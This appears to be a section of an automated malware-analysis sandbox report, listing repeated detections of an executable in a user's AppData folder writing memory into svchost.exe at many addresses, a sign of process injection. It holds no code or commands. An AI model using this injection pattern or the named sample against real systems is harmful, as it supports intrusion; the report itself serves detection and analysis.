Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019240	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019248	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019258	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019260	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019268	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019270	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019278	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019018	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019020	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019028	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019030	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019038	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019040	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019048	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019050	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019058	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019060	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019068	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019070	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019080	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019088	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019090	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019098	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190A0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019288	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019290	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190B8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190C0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190C8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190D0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190D8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190E8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400190F8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019108	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019118	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019120	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019128	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019130	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019138	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019150	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019158	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019160	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019168	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019170	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: B25F9B4010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0F003F30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0F003F48	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F28A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F28B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5080	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140020000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140020000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140021000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140021000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140023000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140023000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140024000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140024000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F28B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F28B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019180	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019190	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0000	Jump to behavior
